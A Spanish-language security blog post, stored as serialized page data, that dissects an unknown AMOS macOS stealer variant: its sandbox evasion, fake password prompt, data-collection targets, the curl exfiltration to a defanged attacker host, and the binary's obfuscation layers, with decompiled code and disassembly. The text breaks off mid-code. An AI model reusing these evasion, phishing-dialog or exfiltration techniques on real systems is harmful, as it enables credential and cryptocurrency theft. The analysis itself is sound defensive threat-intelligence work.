[{"data":1,"prerenderedAt":22857},["ShallowReactive",2],{"post-es-/posts/2026-04-10-incident-to-intelligence":3,"authors_data":2274,"content-es-posts-d887737123081":2613},{"id":4,"title":5,"author":6,"body":8,"cta":2165,"description":14,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2169,"moment":2173,"navigation":2180,"path":2264,"seo":2265,"stem":2266,"tags":2267,"webcast":2167,"__hash__":2273},"content_es/posts/2026-04-10-incident-to-intelligence.md","Anatomía de un AMOS Stealer desconocido: Del alerta a la inmunidad en horas",[7],"Pascal Asch",{"type":9,"value":10,"toc":2129},"minimal",[11,15,18,21,24,29,32,35,38,40,45,48,51,66,69,72,80,83,87,89,92,115,118,126,129,137,144,148,150,153,161,176,180,182,185,190,193,201,205,207,215,219,221,224,228,230,233,241,245,247,255,258,356,359,389,391,395,397,404,407,411,413,497,501,503,514,521,595,606,613,617,619,684,688,690,697,699,703,705,712,738,928,931,939,950,953,961,976,989,991,995,997,1015,1037,1226,1229,1237,1240,1243,1245,1249,1251,1254,1333,1336,1355,1434,1437,1439,1443,1445,1448,1455,1510,1513,1521,1524,1526,1530,1532,1539,1552,1600,1611,1650,1659,1674,1677,1679,1683,1685,1692,1695,1703,1706,1714,1728,1731,1733,1737,1739,1749,1753,1755,1773,1781,1795,1815,1819,1821,1824,1832,1835,1843,1857,1861,1863,1866,1874,1892,1897,1901,1903,1911,1918,1925,1929,1931,1939,1943,1945,1948,1956,1959,1963,1965,1973,1977,1979,1987,1991,1993,2001,2005,2007,2015,2036,2041,2043,2047,2049,2056,2073,2076,2089,2091,2095,2097,2100,2103,2106,2108,2125],[12,13,14],"p",{},"Cuando se activa una alerta en nuestro SOC, el reloj empieza a correr. No solo para el cliente afectado, sino para cada cliente que protegemos. En el panorama actual de amenazas, el momento más peligroso para cualquier organización es la brecha de inteligencia: esa ventana de tiempo entre el despliegue de una nueva variante de malware y el momento en que el resto del mundo se entera de su existencia.",[12,16,17],{},"Para un equipo de seguridad independiente, esta brecha representa un período de vulnerabilidad extrema. En esencia, se está esperando una actualización del proveedor o un feed de firmas público que todavía no existe. Para nuestros clientes, esa brecha se cierra gracias a nuestra plataforma de Shared Threat Intelligence desarrollada internamente.",[12,19,20],{},"Este blogpost es el desglose técnico de cómo desmantelamos una variante de AMOS (Atomic macOS Stealer) no documentada hasta ese momento. Es la historia de cómo se pasa de un único endpoint comprometido al despliegue rápido de capacidades de detección y bloqueo en los entornos de los clientes.",[22,23],"hr",{},[25,26,28],"h1",{"id":27},"el-incidente-un-escenario-con-ioc-desconocido","El incidente: un escenario con IOC desconocido",[12,30,31],{},"{: .h3-font-size}",[12,33,34],{},"La alerta llegó el 12 de marzo de 2026 a las 06:25, hora local. Un endpoint macOS había sido comprometido. Cuando nuestro SOC comenzó a analizar los artefactos, nos encontramos ante la situación que todo analista de amenazas teme: ningún hash de archivo conocido, ninguna dirección IP de C2 ni ninguna firma de comportamiento relevante existía en bases de datos públicas en el momento de la detección.",[12,36,37],{},"La arquitectura completa del ataque solo quedó clara durante el análisis en profundidad posterior. Descubrimos que la infección se basaba en un Universal Binary macOS de 15,7 MB (x86_64 y ARM64) depositado en /private/tmp/helper. Esta muestra no estaba disponible directamente en el sistema; nuestro equipo tuvo que reconstruir la cadena de infección y simular la solicitud de entrega original para recuperar manualmente el binario desde la infraestructura del atacante.",[22,39],{},[41,42,44],"h2",{"id":43},"stage-1-comprobaciones-de-sandbox","Stage 1: Comprobaciones de sandbox",[12,46,47],{},"{: .h4-font-size}",[12,49,50],{},"Antes de que el propio stealer malicioso se ejecutara en la máquina, ya había ejecutado un payload de AppleScript. Todas las cadenas de texto, cada ruta de archivo, cada comando de shell, cada URL, estaban codificadas mediante tres funciones aritméticas personalizadas:",[52,53,55],"div",{"style":54},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[56,57,62],"pre",{"className":58,"code":60,"language":61},[59],"language-text","on ipbgcjzgqa(a, b)\n -- result[i] = chr(a[i] - b[i])\n \non kwcvvjininv(a, b)\n -- result[i] = chr(a[i] + b[i])\n \non xqylheckjx(a, b, offset)\n -- result[i] = chr(a[i] - b[i] - offset)\n","text",[63,64,60],"code",{"__ignoreMap":65},"",[12,67,68],{},"Ninguna de las cadenas aparece en texto plano en ningún lugar. Lo que a primera vista parecía arrays de enteros sin sentido se decodificó, una vez invertido el esquema de codificación, en un framework completo y totalmente operativo de robo y exfiltración de datos.",[12,70,71],{},"Decodificamos estáticamente todos los arrays del script. Los resultados fueron inequívocos:",[52,73,74],{"style":54},[56,75,78],{"className":76,"code":77,"language":61},[59],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[63,79,77],{"__ignoreMap":65},[12,81,82],{},"La URL de descarga estaba deliberadamente diseñada para suplantar una actualización legítima de n8n workflow automation, una herramienta de uso habitual entre desarrolladores e ingenieros de DevOps. No es una elección aleatoria. Señala una campaña dirigida a usuarios técnicamente sofisticados, no a usuarios genéricos que puedan instalar software pirateado.",[41,84,86],{"id":85},"la-comprobación-anti-sandbox","La comprobación anti-sandbox",[12,88,47],{},[12,90,91],{},"Antes de que se produjera ninguna descarga, el script ejecutó una rutina dedicada de detección de VM y sandbox. También recuperamos del incidente un script anti-sandbox independiente:",[52,93,94],{"style":54},[56,95,99],{"className":96,"code":97,"language":98,"meta":65,"style":65},"language-applescript shiki shiki-themes github-light github-dark","set urgufr to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[63,100,101,109],{"__ignoreMap":65},[102,103,106],"span",{"class":104,"line":105},"line",1,[102,107,108],{},"set urgufr to do shell script \"system_profiler SPMemoryDataType\"\n",[102,110,112],{"class":104,"line":111},2,[102,113,114],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[12,116,117],{},"Los resultados se comprobaban contra dos listas. La primera verificaba marcadores de virtualización en los datos de memoria:",[52,119,120],{"style":54},[56,121,124],{"className":122,"code":123,"language":61},[59],"\"QEMU\" \"VMware\" \"KVM\"\n",[63,125,123],{"__ignoreMap":65},[12,127,128],{},"La segunda comprobaba los identificadores de hardware contra un conjunto de números de serie conocidos de máquinas de análisis:",[52,130,131],{"style":54},[56,132,135],{"className":133,"code":134,"language":61},[59],"\"Z31FHXYQ0J\" -- known sandbox machine serial\n\"C07T508TG1J2\" -- known sandbox machine serial \n\"C02TM2ZBHX87\" -- known sandbox machine serial\n\"Chip: Unknown\" -- emulation indicator\n\"Intel Core 2\" -- legacy/VM indicator\n",[63,136,134],{"__ignoreMap":65},[12,138,139,140,143],{},"Si se encontraba alguna coincidencia: ",[63,141,142],{},"exit 100",", terminación completa. En un MacBook Pro real con chip Apple Silicon, todas las comprobaciones pasan en silencio y la ejecución continúa. Se trata de una técnica de evasión de sandbox de nivel profesional que ya estaba en marcha antes de que se descargara un solo byte del binario.",[41,145,147],{"id":146},"escalada-de-privilegios-simple-pero-efectiva-el-diálogo-de-contraseña-falso","Escalada de privilegios simple pero efectiva: el diálogo de contraseña falso",[12,149,47],{},[12,151,152],{},"El script decodificado también contenía el texto utilizado para la escalada de privilegios mediante ingeniería social:",[52,154,155],{"style":54},[56,156,159],{"className":157,"code":158,"language":61},[59],"Title: \"Application wants to install helper\"\nPrompt: \"Required Application Helper. Please enter device\n password to continue.\"\nButton: \"Continue\"\n",[63,160,158],{"__ignoreMap":65},[12,162,163,164,167,168,171,172,175],{},"Este diálogo se muestra mediante una llamada estándar de macOS ",[63,165,166],{},"display dialog"," con ",[63,169,170],{},"with hidden answer",", visualmente indistinguible de un mensaje de autorización legítimo de macOS. La contraseña introducida se utilizaba para invocar ",[63,173,174],{},"login -pf \u003Cusername>",", elevando el proceso a root antes de que se ejecutara el binario.",[41,177,179],{"id":178},"qué-recopiló-el-script","Qué recopiló el script",[12,181,47],{},[12,183,184],{},"Una vez ejecutado el binario, el osascript continuó su propio flujo de recopilación, apuntando a todas las categorías de datos sensibles del sistema. Decodificamos todas las rutas y objetivos de recopilación:",[186,187,189],"h3",{"id":188},"datos-del-navegador-todos-los-navegadores-chromium-safari","Datos del navegador (todos los navegadores Chromium + Safari):",[12,191,192],{},"{: .font-size-4}",[52,194,195],{"style":54},[56,196,199],{"className":197,"code":198,"language":61},[59],"/Login Data /Cookies /Web Data\n/Local Extension Settings/ /IndexedDB/ /Local Storage/leveldb/\n",[63,200,198],{"__ignoreMap":65},[186,202,204],{"id":203},"macos-keychain","macOS Keychain:",[12,206,192],{},[52,208,209],{"style":54},[56,210,213],{"className":211,"code":212,"language":61},[59],"~/Library/Keychains/login.keychain-db -- accessed directly via cat\n",[63,214,212],{"__ignoreMap":65},[186,216,218],{"id":217},"apple-notes","Apple Notes",[12,220,192],{},[12,222,223],{},"Contenido completo exportado como HTML con encabezado de recuento",[186,225,227],{"id":226},"archivos-locales","Archivos locales",[12,229,192],{},[12,231,232],{},"Escritorio y Documentos, hasta 30 MB, con los siguientes objetivos:",[52,234,235],{"style":54},[56,236,239],{"className":237,"code":238,"language":61},[59],"pdf doc docx xls xlsx ppt pptx txt rtf\nkey p12 pem cert pfx sql db sqlite\njson xml yaml conf env csv\n",[63,240,238],{"__ignoreMap":65},[186,242,244],{"id":243},"carteras-de-criptomonedas","Carteras de criptomonedas",[12,246,192],{},[12,248,249,250,254],{},"Una lista codificada de ",[251,252,253],"strong",{},"más de 200 IDs de extensiones de navegador"," dirigida a todas las carteras principales, incluyendo MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI y Exodus.",[12,256,257],{},"Tras la recopilación, todo se preparaba en un directorio temporal con nombre aleatorio y se enviaba:",[52,259,260],{"style":54},[56,261,265],{"className":262,"code":263,"language":264,"meta":65,"style":65},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[63,266,267,301,327,344],{"__ignoreMap":65},[102,268,269,273,277,280,283,287,291,295,298],{"class":104,"line":105},[102,270,272],{"class":271},"sScJk","ditto",[102,274,276],{"class":275},"sj4cs"," -c",[102,278,279],{"class":275}," -k",[102,281,282],{"class":275}," --sequesterRsrc",[102,284,286],{"class":285},"szBVR"," \u003C",[102,288,290],{"class":289},"sZZnC","staging_di",[102,292,294],{"class":293},"sVt8B","r",[102,296,297],{"class":285},">",[102,299,300],{"class":289}," /tmp/out.zip\n",[102,302,303,306,309,312,315,318,321,324],{"class":104,"line":111},[102,304,305],{"class":271},"curl",[102,307,308],{"class":275}," --connect-timeout",[102,310,311],{"class":275}," 120",[102,313,314],{"class":275}," --max-time",[102,316,317],{"class":275}," 300",[102,319,320],{"class":275}," -X",[102,322,323],{"class":289}," POST",[102,325,326],{"class":275}," \\\n",[102,328,330,333,336,339,342],{"class":104,"line":329},3,[102,331,332],{"class":275}," -H",[102,334,335],{"class":289}," \"user: \u003Cuuid>\"",[102,337,338],{"class":275}," -H",[102,340,341],{"class":289}," \"BuildID: \u003Chw_profile>\"",[102,343,326],{"class":275},[102,345,347,350,353],{"class":104,"line":346},4,[102,348,349],{"class":275}," -F",[102,351,352],{"class":289}," \"file=@/tmp/out.zip\"",[102,354,355],{"class":289}," laislivon[.]com/contact\n",[12,357,358],{},"La limpieza seguía de inmediato:",[52,360,361],{"style":54},[56,362,364],{"className":262,"code":363,"language":264,"meta":65,"style":65},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[63,365,366,383],{"__ignoreMap":65},[102,367,368,371,374,376,378,380],{"class":104,"line":105},[102,369,370],{"class":271},"rm",[102,372,373],{"class":275}," -r",[102,375,286],{"class":285},[102,377,290],{"class":289},[102,379,294],{"class":293},[102,381,382],{"class":285},">\n",[102,384,385,387],{"class":104,"line":111},[102,386,370],{"class":271},[102,388,300],{"class":289},[22,390],{},[25,392,394],{"id":393},"stage-2-ingeniería-inversa-del-binario-helper","Stage 2: Ingeniería inversa del binario 'helper'",[12,396,31],{},[12,398,399,400,403],{},"El binario ",[63,401,402],{},"helper"," es donde este análisis se vuelve profundo. Se trata de un ejecutable macOS de propósito específico, ofuscado de forma profesional y diseñado para ser tan difícil de analizar estáticamente como sea posible. Es la parte de esta investigación que requirió el mayor esfuerzo de ingeniería inversa.",[12,405,406],{},"Todo el análisis se realizó con Ghidra utilizando nuestro flujo de trabajo personalizado de análisis ARM64.",[41,408,410],{"id":409},"propiedades-del-archivo","Propiedades del archivo",[12,412,47],{},[52,414,416],{"style":415},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[417,418,420,421,420,437],"table",{"style":419},"width:100%; border-collapse: collapse; font-size: 0.85rem","\n ",[422,423,424,425,420],"thead",{},"\n ",[426,427,428,429,428,434,424],"tr",{},"\n ",[430,431,433],"th",{"style":432},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Propiedad",[430,435,436],{"style":432},"Valor",[438,439,424,440,424,450,424,459,424,467,424,477,424,487,420],"tbody",{},[426,441,428,442,428,447,424],{},[443,444,446],"td",{"style":445},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Formato",[443,448,449],{"style":445},"Mach-O Universal Binary",[426,451,428,452,428,456,424],{},[443,453,455],{"style":454},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Arquitecturas",[443,457,458],{"style":454},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[426,460,428,461,428,464,424],{},[443,462,463],{"style":445},"Tamaño",[443,465,466],{"style":445},"15,7 MB",[426,468,428,469,428,472,424],{},[443,470,471],{"style":454},"MD5",[443,473,474],{"style":454},[63,475,476],{},"4599fdf2fa2099b30d8bbf76703dd634",[426,478,428,479,428,482,424],{},[443,480,481],{"style":445},"SHA-1",[443,483,484],{"style":445},[63,485,486],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[426,488,428,489,428,492,424],{},[443,490,491],{"style":454},"SHA-256",[443,493,494],{"style":454},[63,495,496],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[41,498,500],{"id":499},"empieza-antes-de-main","Empieza antes de main()",[12,502,47],{},[12,504,505,506,509,510,513],{},"Lo primero que confirmamos en Ghidra fue que este binario no se comporta como un ejecutable normal. El punto de entrada real no es ",[63,507,508],{},"main()",". Es una función registrada en ",[63,511,512],{},"__mod_init_func",", un mecanismo de macOS que indica al enlazador dinámico (dyld) que ejecute funciones designadas automáticamente cuando se carga el binario, antes de que se ejecute cualquier código visible para el usuario.",[12,515,516,517,520],{},"La función de inicialización en ",[63,518,519],{},"0x10009f384"," es el verdadero punto de entrada del malware. Descompilamos la salida con Ghidra:",[52,522,523],{"style":54},[524,525,526,530,533,536,540,541,545,546,548,549,552,553,567],"code-block",{},[102,527,529],{"style":528},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[531,532],"br",{},[102,534,535],{"style":528},"// __mod_init_func registered — executes before main()",[102,537,539],{"style":538},"color:#d73a49","void"," ",[102,542,544],{"style":543},"color:#6f42c1","FUN_10009f384","(",[102,547,539],{"style":538},")\n{\n ",[102,550,551],{"style":538},"int"," iVar1;\n",[12,554,555,558,559,545,562,566],{},[102,556,557],{"style":528},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[102,560,561],{"style":543},"_usleep",[102,563,565],{"style":564},"color:#005cc5","0x37e",");",[12,568,569,572,575,576,578,579,582,583,586,587,590,591,594],{},[102,570,571],{"style":528},"// Indirect jump table — 14-state machine",[102,573,574],{"style":528},"// Defeats CFG reconstruction in static analysis tools","\n(*(",[102,577,63],{"style":538}," *)((",[102,580,581],{"style":538},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[102,584,585],{"style":564},"4","\n+ ",[102,588,589],{"style":564},"0x10009f440","))(iVar1);\n",[102,592,593],{"style":538},"return",";\n}",[12,596,597,598,601,602,605],{},"Hay dos aspectos inmediatamente destacables. En primer lugar, el ",[63,599,600],{},"usleep"," de 894 microsegundos al inicio, una señal de temporización anti-sandbox. En segundo lugar, y más relevante, la tabla de salto indirecto en ",[63,603,604],{},"0x10009f43c",". Se trata de un salto calculado donde la dirección de destino se computa en tiempo de ejecución a partir de una tabla de búsqueda. Las herramientas de análisis estático no pueden reconstruir el grafo de flujo de control desde aquí, y el propio Ghidra registra múltiples advertencias de \"bloque inalcanzable\" mientras intenta sin éxito trazar la ruta de ejecución. Esto es deliberado.",[12,607,608,609,612],{},"La tabla de salto controla una ",[251,610,611],{},"máquina de ejecución de 14 estados",". Cada estado realiza un paso discreto del pipeline de descifrado y ejecución. El contador de estados se actualiza tras cada paso, y la máquina itera hasta que todos los estados han sido ejecutados.",[41,614,616],{"id":615},"el-desensamblado-arm64-del-despachador-de-estados","El desensamblado ARM64 del despachador de estados",[12,618,47],{},[52,620,621],{"style":54},[56,622,626],{"className":623,"code":624,"language":625,"meta":65,"style":65},"language-asm shiki shiki-themes github-light github-dark","10009f3fc: stp xzr,xzr,[sp, #0x48]\n10009f41c: mov w0,#0x37e\n10009f420: bl 0x1000a0fa8 ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424: cmp w25,#0xd ; state counter \u003C 14?\n10009f428: b.hi 0x10009fd44 ; exit if done\n10009f42c: mov w8,w25 ; current state index\n10009f430: adr x9,0x10009f440 ; base of jump table\n10009f434: ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438: add x9,x9,x10, LSL #0x2 ; compute target address\n10009f43c: br x9 ; indirect branch, CFG broken here\n","asm",[63,627,628,633,638,643,648,654,660,666,672,678],{"__ignoreMap":65},[102,629,630],{"class":104,"line":105},[102,631,632],{},"10009f3fc: stp xzr,xzr,[sp, #0x48]\n",[102,634,635],{"class":104,"line":111},[102,636,637],{},"10009f41c: mov w0,#0x37e\n",[102,639,640],{"class":104,"line":329},[102,641,642],{},"10009f420: bl 0x1000a0fa8 ; _usleep(0x37e) — 894µs anti-sandbox\n",[102,644,645],{"class":104,"line":346},[102,646,647],{},"10009f424: cmp w25,#0xd ; state counter \u003C 14?\n",[102,649,651],{"class":104,"line":650},5,[102,652,653],{},"10009f428: b.hi 0x10009fd44 ; exit if done\n",[102,655,657],{"class":104,"line":656},6,[102,658,659],{},"10009f42c: mov w8,w25 ; current state index\n",[102,661,663],{"class":104,"line":662},7,[102,664,665],{},"10009f430: adr x9,0x10009f440 ; base of jump table\n",[102,667,669],{"class":104,"line":668},8,[102,670,671],{},"10009f434: ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[102,673,675],{"class":104,"line":674},9,[102,676,677],{},"10009f438: add x9,x9,x10, LSL #0x2 ; compute target address\n",[102,679,681],{"class":104,"line":680},10,[102,682,683],{},"10009f43c: br x9 ; indirect branch, CFG broken here\n",[41,685,687],{"id":686},"seis-capas-de-ofuscación-apiladas","Seis capas de ofuscación apiladas",[12,689,47],{},[12,691,692,693,696],{},"El binario utiliza seis capas de ofuscación distintas, apiladas y encadenadas de modo que la salida de cada una alimenta la siguiente. Cada payload, cada cadena, cada constante interna está codificada. Nada con significado aparece en texto plano en ningún lugar del segmento ",[63,694,695],{},"__const",". Lo que sigue es un desglose completo capa por capa, verificado directamente en Ghidra hasta las instrucciones ARM64 individuales. Aunque cada técnica empleada en este binario es conocida de forma aislada, su aplicación encadenada a través de múltiples etapas creó un flujo de ejecución altamente interdependiente que aumentó considerablemente la complejidad del análisis estático y dinámico.",[22,698],{},[186,700,702],{"id":701},"capa-1-codificación-de-tripletes-en-tiempo-de-compilación","Capa 1: codificación de tripletes en tiempo de compilación",[12,704,192],{},[12,706,707,708,711],{},"Cada cadena del binario no se almacena como caracteres, sino como una secuencia de tripletes aritméticos de 12 bytes. Cada triplete ",[63,709,710],{},"(a, b, shift)"," codifica exactamente un carácter de salida. El esquema de codificación se aplica en tiempo de compilación, lo que significa que ninguna cadena existe como texto plano en el binario, ni siquiera de forma transitoria durante la carga.",[12,713,714,715,718,719,722,723,726,727,718,730,733,734,737],{},"Dos funciones de decodificación separadas se encargan de distintos tamaños de cadena. ",[63,716,717],{},"FUN_100087c08"," en ",[63,720,721],{},"0x100087c08"," decodifica cadenas de 60 caracteres (720 bytes de datos de entrada desde ",[63,724,725],{},"DAT_1006292cc","). ",[63,728,729],{},"FUN_10007ad80",[63,731,732],{},"0x10007ad80"," decodifica cadenas de 56 caracteres (672 bytes desde ",[63,735,736],{},"DAT_10049708c","). Ambas utilizan el mismo algoritmo.",[52,739,740],{"style":54},[524,741,742,745,747,750,540,752,545,754,757,758,760,761,763,764,766,767,770,771],{},[102,743,744],{"style":528},"// FUN_100087c08 @ 0x100087c08",[531,746],{},[102,748,749],{"style":528},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[102,751,539],{"style":538},[102,753,717],{"style":543},[102,755,756],{"style":538},"long"," *param_1)\n{\n ",[102,759,756],{"style":538}," *plVar1;\n ",[102,762,539],{"style":538}," *pvVar2;\n ",[102,765,756],{"style":538}," lVar3;\n ",[102,768,769],{"style":538},"uint"," *puVar4;\n",[12,772,773,774,545,777,780,781,786,789,790,792,793,796,798,801,802,805,806,809,810,813,814,816,817,578,819,821,822,825,826,829,830,832,833,836,837,840,841,578,844,846,847,850,851,854,856,859,860,578,862,864,865,867,868,870,871,876,877,880,881,886,887,890,891,893,894,899,900,902,903,905,906,909,910,913,914,916,917,920,922,925,926,594],{},"pvVar2 = ",[102,775,776],{"style":543},"operator_new",[102,778,779],{"style":564},"0x2d0","); ",[102,782,783,784],{"style":528},"// allocate 720 bytes (60 triplets × 12)",[531,785],{},[102,787,788],{"style":543},"_memcpy","(pvVar2, &DAT_1006292cc, ",[102,791,779],{"style":564},"); ",[102,794,795],{"style":528},"// copy encoded triplets from __const",[531,797],{},[102,799,800],{"style":543},"FUN_1000a0840","(param_1, ",[102,803,804],{"style":564},"0x3c",", ",[102,807,808],{"style":564},"0","); ",[102,811,812],{"style":528},"// init 60-char output buffer","\nlVar3 = ",[102,815,808],{"style":564},";\npuVar4 = (",[102,818,769],{"style":538},[102,820,756],{"style":538},")pvVar2 + ",[102,823,824],{"style":564},"8",");\n",[102,827,828],{"style":538},"do"," {\nplVar1 = (",[102,831,756],{"style":538}," *)*param_1;\n",[102,834,835],{"style":538},"if"," (-",[102,838,839],{"style":564},"1"," \u003C *(",[102,842,843],{"style":538},"char",[102,845,756],{"style":538},")param_1 + ",[102,848,849],{"style":564},"0x17",")) {\nplVar1 = param_1;\n}\n",[102,852,853],{"style":528},"// THE DECODE FORMULA, one character per triplet:",[531,855],{},[102,857,858],{"style":528},"// char = ((b * 3) XOR a) >> shift) - b","\n*(",[102,861,843],{"style":538},[102,863,756],{"style":538},")plVar1 + lVar3) =\n(",[102,866,843],{"style":538},")((",[102,869,551],{"style":538},")(puVar4",[102,872,873,874],{},"-",[102,875,839],{"style":564}," * ",[102,878,879],{"style":564},"3"," ^ puVar4",[102,882,873,883],{},[102,884,885],{"style":564},"2",") >> (*puVar4 & ",[102,888,889],{"style":564},"0x1f","))\n- (",[102,892,843],{"style":538},")puVar4",[102,895,896],{},[102,897,898],{"style":564},"-1",";\nlVar3 = lVar3 + ",[102,901,839],{"style":564},";\npuVar4 = puVar4 + ",[102,904,879],{"style":564},"; ",[102,907,908],{"style":528},"// advance 12 bytes — next triplet","\n} ",[102,911,912],{"style":538},"while"," (lVar3 != ",[102,915,804],{"style":564},"); ",[102,918,919],{"style":528},"// loop exactly 60 times",[531,921],{},[102,923,924],{"style":543},"operator_delete","(pvVar2);\n",[102,927,593],{"style":538},[12,929,930],{},"Y el ensamblado ARM64 correspondiente, donde cada instrucción mapea directamente una operación de la fórmula:",[52,932,933],{"style":54},[56,934,937],{"className":935,"code":936,"language":61},[59],"100087c48: add x9,x20,#0x8\n100087c4c: ldp w10,w11,[x9, #-0x8] ; load a → w10, b → w11\n100087c50: add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n ; (compiler avoids MUL instruction)\n100087c54: eor w10,w12,w10 ; w10 = (b*3) XOR a\n100087c58: ldr w12,[x9], #0xc ; w12 = shift value; post-increment by 12\n100087c5c: asr w10,w10,w12 ; arithmetic right shift — sign bit preserved\n100087c60: sub w10,w10,w11 ; subtract b — final decoded character\n100087c74: strb w10,[x11, x8, LSL ] ; store one byte to output buffer\n100087c78: add x8,x8,#0x1\n100087c7c: cmp x8,#0x3c ; loop counter vs. 60\n100087c80: b.ne 0x100087c4c ; continue until all 60 chars decoded\n",[63,938,936],{"__ignoreMap":65},[12,940,941,942,945,946,949],{},"Un detalle que merece atención: la multiplicación ",[63,943,944],{},"b × 3"," se implementa como ",[63,947,948],{},"add w12, w11, w11, LSL #1",", un desplazamiento y suma que evita por completo una instrucción de multiplicación. Se trata de una optimización clásica del compilador que además hace el código más difícil de reconocer mediante coincidencia de patrones en bases de datos de firmas.",[12,951,952],{},"La fórmula de decodificación completa:",[52,954,955],{"style":54},[56,956,959],{"className":957,"code":958,"language":61},[59],"char = ASR( (b × 3) XOR a, shift ) − b\n",[63,960,958],{"__ignoreMap":65},[12,962,963,964,967,968,971,972,975],{},"El ",[63,965,966],{},"ASR"," (desplazamiento aritmético a la derecha) es fundamental. Preserva el bit de signo. Si el resultado intermedio de ",[63,969,970],{},"(b×3) XOR a"," es negativo, como ocurre con frecuencia, un desplazamiento lógico produciría un resultado completamente distinto. Esto es intencional, y significa que reimplementar simplemente la fórmula con ",[63,973,974],{},">>"," en un lenguaje de alto nivel producirá silenciosamente una salida incorrecta si no se gestiona correctamente la aritmética con signo.",[12,977,978,979,981,982,984,985,988],{},"La variante de 56 caracteres ",[63,980,729],{}," es estructuralmente idéntica, opera sobre ",[63,983,736],{}," con un límite de iteraciones de ",[63,986,987],{},"0x38",". Ambas funciones fueron confirmadas en vivo desde Ghidra durante este análisis.",[22,990],{},[186,992,994],{"id":993},"capa-2-codificación-de-cadenas-hexadecimales","Capa 2: codificación de cadenas hexadecimales",[12,996,192],{},[12,998,999,1000,1003,1004,718,1007,1010,1011,1014],{},"Los bytes brutos producidos por la Capa 1 son en sí mismos caracteres ASCII hexadecimales, no datos binarios. La salida de la decodificación de tripletes de la Capa 1 es una cadena de pares hexadecimales: ",[63,1001,1002],{},"32694e5462...",". Esto se confirma mediante la función de decodificación ",[63,1005,1006],{},"FUN_100000dc0",[63,1008,1009],{},"0x100000dc0",", que implementa una decodificación hexadecimal usando una tabla de búsqueda en ",[63,1012,1013],{},"DAT_1007bb591",".",[12,1016,1017,1018,873,1021,805,1024,873,1027,805,1030,873,1033,1036],{},"La descompilación de Ghidra muestra una sentencia switch que mapea cada carácter hexadecimal (",[63,1019,1020],{},"0x30",[63,1022,1023],{},"0x39",[63,1025,1026],{},"0x41",[63,1028,1029],{},"0x46",[63,1031,1032],{},"0x61",[63,1034,1035],{},"0x66",") a su valor de nibble, ensamblando bytes de salida de dos en dos caracteres:",[52,1038,1039],{"style":54},[524,1040,1041,1044,1047,1050,1051,578,1054,1056,1057,540,1060,1062,1063,1066,1067,420,1070,540,1072,1075,1076,1079,1080,1082,1083,420,1086,540,1088,1075,1091,1079,1094,1082,1096,420,1099,420,1102,540,1104,1062,1106,540,1108,1075,1110,1079,1113,1115,1116,420,1119,540,1121,1062,1124,540,1126,1075,1129,1079,1132,1115,1134,420,1137,540,1139,1062,1142,540,1144,1147,1148,1079,1151,1115,1153,420,1156,540,1158,1062,1161,540,1163,1166,1167,1079,1170,1115,1172,420,1175,540,1177,1062,1180,540,1182,1075,1185,1079,1188,1115,1190,420,1193,540,1195,1062,1197,540,1199,1075,1201,1079,1204,1115,1206,1209,1210,859,1213,578,1216,1218,1219,1221,1222,1225],{},[102,1042,1043],{"style":528},"// FUN_100000dc0 @ 0x100000dc0",[102,1045,1046],{"style":528},"// Hex decoder, processes input two characters per output byte",[102,1048,1049],{"style":538},"switch","(*(",[102,1052,1053],{"style":538},"undefined1",[102,1055,756],{"style":538},")plVar2 + lVar7)) {\n ",[102,1058,1059],{"style":538},"case",[102,1061,1020],{"style":564},": ",[102,1064,1065],{"style":538},"break","; ",[102,1068,1069],{"style":528},"// '0' → 0x00",[102,1071,1059],{"style":538},[102,1073,1074],{"style":564},"0x31",": bVar9 = ",[102,1077,1078],{"style":564},"0x10","; ",[102,1081,1065],{"style":538},"; ",[102,1084,1085],{"style":528},"// '1' → 0x10",[102,1087,1059],{"style":538},[102,1089,1090],{"style":564},"0x32",[102,1092,1093],{"style":564},"0x20",[102,1095,1065],{"style":538},[102,1097,1098],{"style":528},"// '2' → 0x20",[102,1100,1101],{"style":528},"// ... '3' through '9' ...",[102,1103,1059],{"style":538},[102,1105,1026],{"style":564},[102,1107,1059],{"style":538},[102,1109,1032],{"style":564},[102,1111,1112],{"style":564},"0xa0",[102,1114,1065],{"style":538},"; ",[102,1117,1118],{"style":528},"// 'A'/'a' → 0xa0",[102,1120,1059],{"style":538},[102,1122,1123],{"style":564},"0x42",[102,1125,1059],{"style":538},[102,1127,1128],{"style":564},"0x62",[102,1130,1131],{"style":564},"0xb0",[102,1133,1065],{"style":538},[102,1135,1136],{"style":528},"// 'B'/'b' → 0xb0",[102,1138,1059],{"style":538},[102,1140,1141],{"style":564},"0x43",[102,1143,1059],{"style":538},[102,1145,1146],{"style":564},"99",": bVar9 = 